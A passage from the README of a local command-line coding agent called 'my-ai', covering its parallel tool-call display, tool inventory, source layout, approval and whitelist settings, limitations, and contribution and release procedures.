MY_AI_COMPACTION_BUDGET=8000Bad input (negative, non-numeric) fails fast on the first compaction call with a clear message — easier to debug than a silent fallback. Calling code can also pass maxTokens explicitly to compactMessages(), which always wins over the env var.
Try it
you › create a hello.py file that prints "hello from my-ai" and runs itYou should see the model planning (TodoWrite), then creating the file, then running it via bash.
Worked examples
Longer, real workflows live in examples/:
examples/refactor.md— a multi-file rename with the test suite pinned as a safety net.examples/whitelist-extension.md— optpnpm/bun/denointo the read-only whitelist viaMY_AI_SAFE_COMMANDS.examples/think-discipline.md— what the dim stderr thinkpad looks like next to the clean stdout answer.examples/v0.7.4-buffy-prompts.md— the v0.7.4 release-flow split: 5 Bufy-side (B1–B5) prompts paired with Claude's C1–C5. B1–B3 are the smoke × 3 + README-parity + Scenario E additions; B4–B5 are thenpm publish+git push/gh releaseops.
Parallel-tool chip layer (Tier 1.6 – 1.9)
When the model emits a parallel batch of tool calls, every batch reads as a bookended cluster on stderr:
- Tier 1.6 pending → completed pills. A dim
⚡ N tool(s) in parallelheader followed by cyan○pending pills (one per call), then a tinted completed pill below each: green●ok, red✖err, yellow⊘blocked. The hint next to each completed pill summarizes the effect —path · CREATE (+N lines)forwrite_file,±N linesforedit_file,$ cmd · N linesforbash,path · deleted,path · N issuesforread_lints, etc. Pure presentation insrc/chips.ts, ~180 lines. - Tier 1.7 cumulative batch timing. A second dim
⚡ N tool(s) · <time>line closes every batch — wallclock of the parallel dispatch, e.g.⚡ 3 tools · 234ms. Anchors the perf signal to the chips it timed. - Tier 1.8 parallel-conflict detection. Two
PLAN_TRACKED_TOOLScalls in the same parallel batch targeting the same path (currentlywrite_file/edit_file/delete_file) silently last-write-wins underPromise.all. A neutral dim⚠ <path> · colliding writes at indices <i,j,k>row renders AFTER the completed chips but BEFORE the timing summary — one per detected collision. The default profile also escalates these batches to the Tier 1.4 plan gate (the user reviews the colliding writes BEFORE they race) viasrc/cli.ts agentTurn's newthreshold.trigger: "conflict". Path A (escalate-to-prompt) is current; Path B (auto-serialize) is opt-in viaMY_AI_AUTO_SERIALIZE=1. - Tier 1.9 verbose-mode homogeneity. Under
--verbose(or/verbose on), every chip class threads the flag: completed pills get a dim↳ <result preview>line; pending pills get a dim↳ args: <full JSON>line; the cumulative batch timing gets· slowest: <name> <ms|secs>; the conflict chip gets(name1, name2)so you can see WHICH tools raced. Non-verbose callers get the byte-identical Tier 1.6 output. - Tier 1.9 per-turn cost chip. Anthropic SDK reports exact
input_tokens/output_tokens(↳ model-reportedunder verbose). The OpenAI-compatible Ollama endpoint doesn't surface usage, sooutput_tokensis approximated via the sameMath.ceil(visibleContent.length / 4)heuristic the compactor uses (↳ estimate (chars/4)under verbose). The chip renders as a single dim💸 ~<in> in / ~<out> out · <total> tokrow between the conflict chips and the timing summary.
The full chip surface is pinned in tests/chips.test.ts (55 fixtures) and end-to-end exercised by tools/tier1.6-chip-smoke.ts (5 scenarios: A defaults B verbose C readonly D parallel-conflict E auto-serialize). Every claim above has a fixture or smoke scenario.
Tool inventory
| Tool | What it does |
|---|---|
| read_file | Reads file contents. Supports offset/limit for large files. |
| write_file | Creates or overwrites a file (creates parent dirs). |
| edit_file | Targeted string replacement. Errors if old_string isn't unique. |
| bash | Runs shell commands with 5-minute timeout. Reserved for things that need a shell. |
| list_dir | Lists immediate contents of a directory. |
| Glob | Finds files by glob pattern (e.g. **/*.ts). |
| Grep | Searches file contents with regex. Ripgrep when available, falls back to a pure-Node walker. |
| WebFetch | Fetches a URL and returns readable text (strips HTML). |
| TodoWrite | Tracks a task list in conversation. The model uses this to plan its work. |
| ask_user | Pauses the loop and asks the human a structured question (single or multi select, with optional free-form fallback). Use when a decision, blocker, or missing credential should not be auto-resolved. Replaces ad-hoc prose questions with clean schema answers. |
| tree | Compact read-only directory tree. Wraps src/explore.ts#fsTree. Skips node_modules, .git, and dotfiles by default; capped at depth 3 + 200 entries. The same helper powers the /tree slash command, so a delegated explorer / reviewer sub-agent can map a project without a flood of list_dir calls. |
Project structure
src/
├── cli.ts # Main chat loop, message history, slash commands, approval gate
├── client.ts # Provider dispatcher (reads PROVIDER env); runtime provider switch
├── doctor.ts # /doctor + /doctor --explain (free-engine diagnostics)
├── prompts.ts # System prompt (independently written; Claude Code-style behavior)
├── server.ts # `my-ai serve` HTTP + SSE + /api/upload layer (BW-A1)
├── agent-engine.ts # chat → tool dispatch loop shared with REPL's agentTurn (BW-A1)
├── tools.ts # Tool definitions + execute() handlers
├── whitelist.ts # Bash read-only whitelist + MY_AI_SAFE_COMMANDS merge (testable)
├── danger.ts # Danger tagging for the approval prompt
├── audit.ts # Append-only approval audit log (.my-ai/audit.log)
├── profiles.ts # Permission profiles (default/readonly/paranoid)
├── compaction.ts # Long-context compaction (fold oldest turns into a summary)
├── tokens.ts # /tokens report (per-role + total + budget + utilization; reuse compaction's heuristic)
├── think.ts # think-discipline state machine (visible vs. reasoning)
├── multimodal.ts # File → ContentPart[] (image_url, text block, pdf extract, routed note) (BW-A2)
├── mentions-resolve.ts # REPL @mention + serve uploaded-file → resolver, vision-gate aware (BW-A2)
├── image-meta.ts # Pure image-header decoder (PNG/JPEG/GIF/WebP/BMP → {width,height,mime}) (BW-A2)
├── lang-detect.ts # Per-message lang/code heuristic for the chat wire (BW-A2)
└── providers/
├── types.ts # Provider interface, normalized Message types
├── capabilities.ts # providerSupportsImages(name, model) regex gate (BW-A2)
├── anthropic.ts # Anthropic Claude SDK adapter
├── ollama.ts # OpenAI-compatible adapter (Ollama, LM Studio, vLLM)
└── mock.ts # Offline scripted provider (test/smoke only, gated behind MY_AI_MOCK)
ui/
└── index.html # `my-ai serve` chat UI shell — single-file HTML + inline JS (BW-A1)How the tool loop works
- You type a message.
- The CLI sends it to the configured provider along with conversation history + available tools.
- The model responds. It may:
- Return text only — we print it, end the turn.
- Call one or more tools — we run them in parallel, feed the results back as
toolmessages, and the model gets another turn.
- Loop continues until the model's response has no tool_calls (i.e. it's done).
This is the same agentic tool-loop pattern Claude Code uses, reimplemented here from its publicly documented behavior.
Customizing
- Change the model: edit
OLLAMA_MODEL(orANTHROPIC_MODEL) in.env. - Change the personality: edit
src/prompts.ts. - Add a tool: define a
ToolHandlerinsrc/tools.tsand add it to thetoolsarray. - Add a new provider: implement the
Providerinterface in a new file undersrc/providers/, then wire it up insrc/client.ts.
Limitations
This is an MVP focused on being easy to read and run.
- Approval prompts gate destructive / shell-spawning tools (
bash,delete_file,read_lints) by default — bypass with--no-approveorMY_AI_AUTO_APPROVE=1(see above). - No conversation persistence —
/exitclears history. Restart loses context. - No sub-agent spawning — unlike Codebuff or Claude Code's Task tool, there's just one model.
- No
file_path:line_numberrendering in the CLI (the model produces them, but the terminal won't hyperlink). - Local model quality is hardware-dependent — a
3bmodel will make mistakes a32bwon't. Pick a size that matches your GPU.
Contributing
- CHANGELOG convention — every commit that ships a user-facing feature, behavior change, deprecation, or safety fix updates
[CHANGELOG.md](./CHANGELOG.md)'s[Unreleased]section in the same commit (same-commit-per-feature rule). Doc-only, test-only, refactor-only, and chore commits are exempt — they don't ship anything a user would notice. See the top ofCHANGELOG.mdfor the full rationale. - Tests pin behavior — any new code under
src/must also land a pinned test intests/(the established pattern issrc/whitelist.ts+tests/whitelist.test.ts, a SAFE/UNSAFE battery that locks the safety boundary). Runnpm testbefore committing. Regressions in the safety boundary are a real risk if tests are skipped. - Typecheck before commit —
npm run typecheckmust pass. CI (.github/workflows/ci.yml) runs typecheck + test + smoke on Node 20 and 22; the.githooks/pre-pushhook runs the same gate locally (enable withgit config core.hooksPath .githooks). - Commit message style — Conventional Commits prefix. Established prefixes in this repo:
feat:(new feature),feat(scope):(scoped feature — e.g.feat(doctor)),fix:(bug fix),fix(scope):(scoped fix),chore(release):(release cut),docs:(doc-only commit that doesn't ship a behavior change). Use the scope tag to tie the commit to its component. - Releasing — when shipping a version, the cut is mechanical:
- Open
CHANGELOG.md, rename## [Unreleased]to## [X.Y.Z] - YYYY-MM-DDmoving its contents into the new dated block, leave[Unreleased]empty for the next cycle. - Bump
versioninpackage.jsonto match. - Commit with
chore(release): cut vX.Y.Z — <one-line summary>(use scoped env-var identity so global git config isn't touched; seechore(release): cut v0.4.0for the established form). - Tag locally:
git tag -a vX.Y.Z -m "vX.Y.Z — <summary>". - Extract the new section to release notes:
bash tools/cut-release-section.sh vX.Y.Z > /tmp/vX.Y.Z-notes.md. The helper uses substring match so dotted version forms don't get tripped up by awk regex metachars. - Push:
git push origin main(the release commit) andgit push origin vX.Y.Z(the tag). - Publish:
gh release create vX.Y.Z --title "vX.Y.Z — <summary>" --notes-file /tmp/vX.Y.Z-notes.md. - Rebuild the source tarball:
git archive --format=tar.gz -o my-ai-vX.Y.Z.tar.gz vX.Y.Z(always from the local tag, never HEAD — keeps the tarball pinned to the released state).
- Open
Hardware sanity check
| Ollama model size | RAM | Recommended hardware | |---|---|---| | 3B params | 4 GB | Any modern laptop, CPU OK (slow) | | 7B params | 8 GB | 8 GB+ NVIDIA GPU recommended | | 13B params | 12 GB | 12 GB+ NVIDIA GPU | | 32B params | 20 GB | 24 GB GPU (e.g. RTX 3090/4090) | | 70B+ params | 40+ GB | Multi-GPU / server-grade |
If you have no GPU, stick to 3B and accept ~2–5 tokens/sec. With even a 6 GB GPU, 7B feels fast.
License
MIT
